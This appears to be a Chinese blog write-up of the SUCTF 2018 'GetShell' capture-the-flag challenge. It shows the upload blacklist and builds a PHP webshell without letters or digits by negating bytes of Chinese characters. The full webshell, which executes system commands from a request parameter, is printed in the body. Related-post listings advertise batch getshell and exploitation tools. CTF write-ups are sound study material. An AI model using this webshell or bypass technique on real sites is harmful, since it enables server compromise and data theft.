[SUCTF 2018]GetShell

最新推荐文章于 2024-03-05 07:00:00 发布
最新推荐文章于 2024-03-05 07:00:00 发布
阅读量1.3k 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43801002/article/details/107621240
版权

题目
image.png
image.png
过程

if($contents=file_get_contents($_FILES["file"]["tmp_name"])){
    $data=substr($contents,5);
    foreach ($black_char as $b) {
        if (stripos($data, $b) !== false){
            die("illegal char");
        }
    }     
}

发现可以上传php文件,访问过后发现,直接显示。意图很明显,上传恶意文件,然后文件包含并使用。
1.使用bp测试后,发现只有极少一部分可以通过,几番尝试,最终发现需要使用不带数字和字母的🐴。
UTF-8编码的某个汉字,并将其中某个字符取出来,比如’和’{2}的结果是"\x8c",其取反即为字母s。

echo ~茉[$____];//s
echo ~内[$____];//y
echo ~茉[$____];//s
echo ~苏[$____];//t
echo ~的[$____];//e
echo ~咩[$____];//m
echo ~课[$____];//P
echo ~尬[$____];//O
echo ~笔[$____];//S
echo ~端[$____];//T
echo ~瞎[$____];//a

最终构成🐴,使用a接受参数,执行系统命令

<?=$_=[];$__.=$_;$____=$_==$_;$___=~茉[$____];$___.=~内[$____];$___.=~茉[$____];$___.=~苏[$____];$___.=~的[$____];$___.=~咩[$____];$_____=_;$_____.=~课[$____];$_____.=~尬[$____];$_____.=~笔[$____];$_____.=~端[$____];$__________=$$_____;$___($__________[~瞎[$____]]);

3.执行env即可
image.png

浩歌已行
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
oracleshell执行新医保数据转换后台
viviliving的专栏
03-20 238
select LinxRUNCMD('/data05/sql/exec.sh /data05/sql/test.sql') cmd from dual; exec.sh #!/usr/bin/bash source ~/.bash_profile echo $1 date>$1.log /usr/bin/nohup /u01/app/oracle/product/12.1.0/db_1/bin/sqlplus hsa_lzjbsi/hsa_lzjbsi@192.168.217.192/OR.
getshell思路
Bu2n的博客
02-23 5708
getshell能干嘛文件上传getshell文件包含getshellsql注入getshell操作系统漏洞getshellRCE getshell总结 授人以鱼,不如授人以渔 getshell能干嘛 1.执行终端命令 2.文件管理(增删改查) 3.数据管理(增删改查,前提找到root用户密码) 文件上传getshell 网站有上传点,最容易getshell。 直接上传一个一句话木马,然后使用webshell管理工具,就能成功getshell 如果web应用对上传文件的文件进行过滤,要想办法绕.
[SUCTF 2018]GetShell --不会编程的崽
最新发布
不会编程的崽的博客
03-05 798
文件上传 自增&取反绕过
BUUCTF:[SUCTF 2018]GetShell
末初的CSDN博客
08-01 1812
题目地址:https://buuoj.cn/challenges#[SUCTF%202018]GetShell if($contents=file_get_contents($_FILES["file"]["tmp_name"])){ $data=substr($contents,5); foreach ($black_char as $b) { if (stripos($data, $b) !== false){ die("illegal cha
GetShell的姿势总结
CanMeng'Blog - 一个WEB安全渗透的技术爱好者
03-20 4114
0x00 什么是WebShell 渗透测试工作的一个阶段性目标就是获取目标服务器的操作控制权限,于是WebShell便应运而生。Webshell中的WEB就是web服务,shell就是管理攻击者与操作系统之间的交互。Webshell被称为攻击者通过Web服务器端口对Web服务器有一定的操作权限,而webshell常以网页脚本的形式出现。常见的WebShell使用asp、jsp和php来编写,提供了如执行系统命令、文件上传下载、数据库管理等功能。 0x01 获取WebShell的方式 获取W...
网站渗透总结之Getshell用法大全
LinkSLA的博客
11-07 2287
后台数据库备份getshell,上传图片马并获取图片马路径,通过数据库备份修改后缀名,如有后缀名无法修改或路径无法修改限制可修改前端代码绕过,当所备份的数据库来源无法修改时,我们可以通过首先将一句话木马写入数据库
批量getshell工具
09-08
2017最新版的批量getshell工具,最全的cms识别系统,最快的getshell行动,各种cms,各种漏洞,各种getshell,你值得拥有!
ThinkPHP v5.x命令执行利用工具(可getshell
11-19
在这个场景中,"ThinkPHP v5.x命令执行利用工具(可getshell)"指的是一个专门针对ThinkPHP v5.x版本的安全漏洞进行利用的工具,该工具能够使得攻击者通过命令执行漏洞获取服务器的shell访问权限。 命令执行漏洞...
jboss漏洞getshell工具.zip
08-26
【JBoss 漏洞与 GetShell 工具详解】 JBoss 是一款广泛使用的开源 Java 应用服务器,由 Red Hat 公司开发并维护。它提供了全面的企业级应用程序部署和管理功能,支持多种 Java EE 规范。然而,由于其复杂性和广泛...
getshell工具使用教程
04-03
在网络安全和渗透测试领域,"getshell"是一个常见的术语,指的是获取远程服务器的命令执行权限,从而能够控制或访问目标系统。在这个“getshell工具使用教程”中,我们将深入探讨如何利用特定的工具来实现这一目标。...
Getshell最全总结.pdf
07-22
getshell最全总结
2019-新闻原getshell.rar
09-26
标题中的“2019-新闻原getshell.rar”表明这是一个关于2019年针对新闻源网站的getshell工具的压缩文件。Getshell通常指的是在Web安全领域中,攻击者通过利用网站漏洞获取服务器的命令执行权限,从而能够上传webshell...
批量getshell工具新版
12-21
批量getshell工具【2023最新】这是一种内部有多个漏洞,可自动进行url采集,自动爬虫多个引擎和友情链接url,过狗一句话,轻松日出上千。
dz7.2一键getshell
07-22
dz7.2一键getshell,python脚本,亲测成功
帆软V9getshell1
08-03
帆软 V9getshell注意: 这个漏洞是任意文件覆盖,上传 JSP 马,需要找已存在的 jsp 文件进行覆盖 Tomcat启动帆软后默认存在的 JSP 文件
拿到GETSHELL之后的提权
weixin_69678131的博客
05-12 1406
getshell之后的提权
后台getshell常用技巧
热门推荐
黑面狐
04-03 1万+
1.利用文件上传漏洞,找文件上传处想办法上传php文件。 一些网站在设置可以允许修改上传的文件类型则直接添加php 有时候会还有检测是否为php文件,可以通过文件名变形,大小写,双写等形式绕过,只要是黑名单的都比较好绕过 很多cms还有.hatccess文件禁止访问或者执行这个目录下的文件的情况 这种情况直接上传一个.hatccess文件覆盖这个,让其失效。 或者上传不重命名的...
redis未授权getshell四种方式
BING
04-24 4221
Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据。在两个Redis实例设置主从模式的时候,Redis的主机实例可以通过FULLRESYNC同步文件到从机上,然后在从机上加载so文件,我们就可以执行拓展的新命令了。
getshell脚本
09-09
getshell脚本是用于在目标网站上植入恶意代码或命令执行的脚本。通过使用有效的用户名和密码组合,getshell脚本可以自动登录到目标网站的后台,并替换cookies以保持登录状态。一种常见的getshell脚本演示了如何使用...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值